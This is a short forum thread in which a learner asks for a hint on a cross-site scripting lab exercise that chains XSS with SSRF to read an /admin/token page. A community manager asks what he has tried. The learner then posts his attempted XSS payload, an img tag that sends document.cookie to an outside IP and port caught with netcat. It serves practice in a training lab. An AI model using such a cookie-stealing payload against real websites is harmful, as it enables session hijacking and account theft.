shubham
Bronze I
Bronze ICross-Site Scripting: Ep.6 – Further Exploitation
I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
Forum Discussion
KieranRowley
Community Manager
Community ManagerHi shubham welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
shubhamBronze I
Bronze IThanks for welcome.
So I tire using netcat with the payload in message to make a reverse connection
Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>
